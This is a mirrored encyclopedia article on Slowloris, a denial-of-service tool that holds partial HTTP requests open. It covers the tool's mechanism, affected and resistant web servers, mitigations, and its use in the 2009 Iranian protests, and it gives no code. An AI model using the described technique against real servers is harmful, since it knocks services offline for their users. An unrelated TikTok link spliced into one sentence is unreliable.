Slowloris (computer security)

Last updated

Slowloris
Initial release17 June 2009
Stable release
0.7
Written in Perl
Platform Cross-platform
Size 36 kb
Type Hacking tool
Website ha.ckers.org/slowloris/

Slowloris is a type of denial of service attack tool which allows a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports.

Contents

Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent HTTP headers, adding to, but never completing, the request. Affected servers will keep these connections open, filling their maximum concurrent connection pool, eventually denying additional connection attempts from clients. [1]

The program was named after slow lorises, a group of primates which are known for their slow movement.https://www.tiktok.com/@avichay.adraee?_t=8gcUvHbZBMm&_r=1

Affected web servers

This includes but is not necessarily limited to the following, per the attack's author: [1]

Vulnerable to Slowloris attack on the TLS handshake process:

Because Slowloris exploits problems handling thousands of connections, the attack has less of an effect on servers that handle large numbers of connections well. Proxying servers and caching accelerators such as Varnish, nginx, and Squid have been recommended [7] to mitigate this particular kind of attack. In addition, certain servers are more resilient to the attack by way of their design, including Hiawatha, [8] IIS, lighttpd, Cherokee, and Cisco CSS.

Mitigating the Slowloris attack

While there are no reliable configurations of the affected web servers that will prevent the Slowloris attack, there are ways to mitigate or reduce the impact of such an attack. In general, these involve increasing the maximum number of clients the server will allow, limiting the number of connections a single IP address is allowed to make, imposing restrictions on the minimum transfer speed a connection is allowed to have, and restricting the length of time a client is allowed to stay connected.

In the Apache web server, a number of modules can be used to limit the damage caused by the Slowloris attack; the Apache modules mod_limitipconn, mod_qos, mod_evasive, mod security, mod_noloris, and mod_antiloris have all been suggested as means of reducing the likelihood of a successful Slowloris attack. [1] [9] Since Apache 2.2.15, Apache ships the module mod_reqtimeout as the official solution supported by the developers. [10]

Other mitigating techniques involve setting up reverse proxies, firewalls, load balancers or content switches. [11] Administrators could also change the affected web server to software that is unaffected by this form of attack. For example, lighttpd and nginx do not succumb to this specific attack. [1]

Notable usage

During the protests that erupted in the wake of the 2009 Iranian presidential election, Slowloris arose as a prominent tool used to leverage DoS attacks against sites run by the Iranian government. [12] The belief was that flooding DDoS attacks would affect internet access for the government and protesters equally, due to the significant bandwidth they can consume. The Slowloris attack was chosen instead, because of its high impact and relatively low bandwidth. [13] A number of government-run sites were targeted during these attacks, including gerdab.ir, leader.ir, and president.ir. [14]

A variant of this attack was used by spam network River City Media to force Gmail servers to send thousands of messages in bulk, by opening thousands of connections to the Gmail API with message sending requests, then completing them all at once. [15]

Similar software

Since its release, a number of programs have appeared that mimic the function of Slowloris while providing additional functionality, or running in different environments: [16]

See also

Related Research Articles

<span class="mw-page-title-main">Apache HTTP Server</span> Open-source web server software

The Apache HTTP Server is a free and open-source cross-platform web server software, released under the terms of Apache License 2.0. It is developed and maintained by a community of developers under the auspices of the Apache Software Foundation.

<span class="mw-page-title-main">Squid (software)</span> Caching and forwarding HTTP web proxy

Squid is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching World Wide Web (WWW), Domain Name System (DNS), and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic. Although used for mainly HTTP and File Transfer Protocol (FTP), Squid includes limited support for several other protocols including Internet Gopher, Secure Sockets Layer (SSL), Transport Layer Security (TLS), and Hypertext Transfer Protocol Secure (HTTPS). Squid does not support the SOCKS protocol, unlike Privoxy, with which Squid can be used in order to provide SOCKS support.

In web applications, a rewrite engine is a software component that performs rewriting on URLs, modifying their appearance. This modification is called URL rewriting. It is a way of implementing URL mapping or routing within a web application. The engine is typically a component of a web server or web application framework. Rewritten URLs are used to provide shorter and more relevant-looking links to web pages. The technique adds a layer of abstraction between the files used to generate a web page and the URL that is presented to the outside world.

Server Side Includes (SSI) is a simple interpreted server-side scripting language used almost exclusively for the World Wide Web. It is most useful for including the contents of one or more files into a web page on a web server, using its #include directive. This could commonly be a common piece of code throughout a site, such as a page header, a page footer and a navigation menu. SSI also contains control directives for conditional features and directives for calling external programs. It is supported by Apache, LiteSpeed, nginx, IIS as well as W3C's Jigsaw. It has its roots in NCSA HTTPd.

lighttpd

lighttpd is an open-source web server optimized for speed-critical environments while remaining standards-compliant, secure and flexible. It was originally written by Jan Kneschke as a proof-of-concept of the c10k problem – how to handle 10,000 connections in parallel on one server, but has gained worldwide popularity. Its name is a portmanteau of "light" and "httpd".

The Web Server Gateway Interface is a simple calling convention for web servers to forward requests to web applications or frameworks written in the Python programming language. The current version of WSGI, version 1.0.1, is specified in Python Enhancement Proposal (PEP) 3333.

Web server software allows computers to act as web servers. The first web servers supported only static files, such as HTML, but now they commonly allow embedding of server side applications.

<span class="mw-page-title-main">HTTP compression</span> Capability that can be built into web servers and web clients

HTTP compression is a capability that can be built into web servers and web clients to improve transfer speed and bandwidth utilization.

The Apache JServ Protocol (AJP) is a binary protocol that can proxy inbound requests from a web server through to an application server that sits behind the web server. AJP is a highly trusted protocol and should never be exposed to untrusted clients, which could use it to gain access to sensitive information or execute code on the application server.

Nginx is a web server that can also be used as a reverse proxy, load balancer, mail proxy and HTTP cache. The software was created by Igor Sysoev and publicly released in 2004. Nginx is free and open-source software, released under the terms of the 2-clause BSD license. A large fraction of web servers use Nginx, often as a load balancer.

mod_qos is a quality of service (QoS) module for the Apache HTTP server implementing control mechanisms that can provide different priority to different requests.

ModSecurity, sometimes called Modsec, is an open-source web application firewall (WAF). Originally designed as a module for the Apache HTTP Server, it has evolved to provide an array of Hypertext Transfer Protocol request and response filtering capabilities along with other security features across a number of different platforms including Apache HTTP Server, Microsoft IIS and Nginx. It is free software released under the Apache license 2.0.

Web2py is an open-source web application framework written in the Python programming language. Web2py allows web developers to program dynamic web content using Python. Web2py is designed to help reduce tedious web development tasks, such as developing web forms from scratch, although a web developer may build a form from scratch if required.

SPDY is an obsolete open-specification communication protocol developed for transporting web content. SPDY became the basis for HTTP/2 specification. However, HTTP/2 diverged from SPDY and eventually HTTP/2 subsumed all usecases of SPDY. After HTTP/2 was ratified as a standard, major implementers, including Google, Mozilla, and Apple, deprecated SPDY in favor of HTTP/2. Since 2021, no modern browser supports SPDY.

<span class="mw-page-title-main">WebSocket</span> Computer network protocol

WebSocket is a computer communications protocol, providing full-duplex communication channels over a single TCP connection. The WebSocket protocol was standardized by the IETF as RFC 6455 in 2011. The current API specification allowing web applications to use this protocol is known as WebSockets. It is a living standard maintained by the WHATWG and a successor to The WebSocket API from the W3C.

<span class="mw-page-title-main">Helicon Ape</span>

Helicon Ape is a piece of software by Helicon Tech designed to introduce Apache functionality on IIS web servers. Helicon Ape was created as an ASP.NET module for IIS 7, implementing functionality of more than 35 Apache modules, that allow using Apache configurations on IIS and extending standard IIS capabilities.

FastCGI is a binary protocol for interfacing interactive programs with a web server. It is a variation on the earlier Common Gateway Interface (CGI). FastCGI's main aim is to reduce the overhead related to interfacing between web server and CGI programs, allowing a server to handle more web page requests per unit of time.

HTTP/2 is a major revision of the HTTP network protocol used by the World Wide Web. It was derived from the earlier experimental SPDY protocol, originally developed by Google. HTTP/2 was developed by the HTTP Working Group of the Internet Engineering Task Force (IETF). HTTP/2 is the first new version of HTTP since HTTP/1.1, which was standardized in RFC 2068 in 1997. The Working Group presented HTTP/2 to the Internet Engineering Steering Group (IESG) for consideration as a Proposed Standard in December 2014, and IESG approved it to publish as Proposed Standard on February 17, 2015. The HTTP/2 specification was published as RFC 7540 on May 14, 2015.

Brotli is a lossless data compression algorithm developed by Google. It uses a combination of the general-purpose LZ77 lossless compression algorithm, Huffman coding and 2nd-order context modelling. Brotli is primarily used by web servers and content delivery networks to compress HTTP content, making internet websites load faster. A successor to gzip, it is supported by all major web browsers and has become increasingly popular, as it provides better compression than gzip.

<span class="mw-page-title-main">Slowdroid</span> Experimental denial of service attack

SlowDroid is the first denial of service attack which allows a single mobile device to take down a network server requiring minimal bandwidth. The attack has been created for research purposes by Enrico Cambiaso and Maurizio Aiello for the IEIIT Institute of the National Research Council of Italy and released as an Android application.

References

  1. 1 2 3 4 "Slowloris HTTP DoS". Archived from the original on 26 April 2015. Retrieved 26 June 2009.{{cite web}}: CS1 maint: bot: original URL status unknown (link)
  2. "Archived copy" (PDF). Archived from the original (PDF) on 1 February 2014. Retrieved 15 May 2013.{{cite web}}: CS1 maint: archived copy as title (link)
  3. "Slowloris". www.powerwaf.com. Retrieved 17 July 2023.
  4. "Slowloris". www.powerwaf.com. Retrieved 17 July 2023.
  5. "Slowloris". www.powerwaf.com. Retrieved 17 July 2023.
  6. "Slowloris". www.powerwaf.com. Retrieved 17 July 2023.
  7. "How to best defend against a "slowloris" DOS attack against an Apache web server?". serverfault.com. Retrieved 28 December 2016.
  8. "Performance testing while under attack". hiawatha-webserver.org. 28 February 2014.
  9. "mod_noloris: defending against DoS". niq's soapbox. July 2009. Retrieved 7 January 2012.
  10. "mod_reqtimeout - Apache HTTP Server". Httpd.apache.org. Retrieved 3 July 2013.
  11. Breedijk, Frank (22 June 2009). "Slowloris and Nkiller2 vs. the Cisco CSS load balancer". Cupfighter.net. Archived from the original on 15 February 2012. Retrieved 7 January 2012.
  12. Zdrnja, Bojan (23 June 2009). "ISC Diary | Slowloris and Iranian DDoS attacks". Isc.sans.org. Retrieved 7 January 2012.
  13. Archived 29 June 2009 at the Wayback Machine
  14. Archived 11 August 2009 at the Wayback Machine
  15. Vickery, Chris (6 March 2017). "Spammergate: The Fall of an Empire". MacKeeper Security Watch. Archived from the original on 6 March 2017.
  16. Robert "RSnake" Hansen. "Slowloris" (PDF). SecTheory. Retrieved 7 January 2012.
  17. "PyLoris". MotomaSTYLE. 19 June 2009. Archived from the original on 15 July 2009. Retrieved 7 January 2012.
  18. "Slowloris rewrite in Python". GitHub . Retrieved 10 May 2017.
  19. valyala. "Slowloris for nginx DoS". GitHub . Retrieved 4 February 2014.
  20. Tsankov, Ivaylo (22 April 2022), slowloris - Golang distributed Slowloris attack , retrieved 24 April 2022
  21. "How to help take down gerdab.ir in 5 easy steps". cyberwar4iran. 28 June 2009. Retrieved 7 January 2012.
  22. "Full Disclosure: apache and squid dos". Seclists.org. 19 June 2009. Retrieved 7 January 2012.
  23. "Testing Web Servers for Slow HTTP Attacks". qualys.com. 19 September 2011. Retrieved 13 January 2012.
  24. "shekyan/slowhttptest: Application Layer DoS attack simulator". GitHub. Retrieved 19 April 2017.
  25. "Simple script to check if some server could be affected by Slowloris attack". github.com/felmoltor. 31 December 2012. Retrieved 31 December 2012.
  26. abilash. "Slowloris for OSX". GitHub . Retrieved 8 April 2017.
  27. Davis, Ethan (17 February 2018), sloww: Lightweight Slowloris attack CLI in Node , retrieved 18 February 2018
  28. Bassel Shmali (28 November 2021). "Slowloris written in .Net core". GitHub .
  29. Cambiaso, Enrico; Papaleo, Gianluca; Aiello, Maurizio (2014). "SlowDroid: Turning a Smartphone into a Mobile Attack Vector". 2014 International Conference on Future Internet of Things and Cloud. pp. 405–410. doi:10.1109/FiCloud.2014.72. ISBN   978-1-4799-4357-9. S2CID   14792419.
This page is based on this Wikipedia article
Text is available under the CC BY-SA 4.0 license; additional terms may apply.
Images, videos and audio are available under their respective licenses.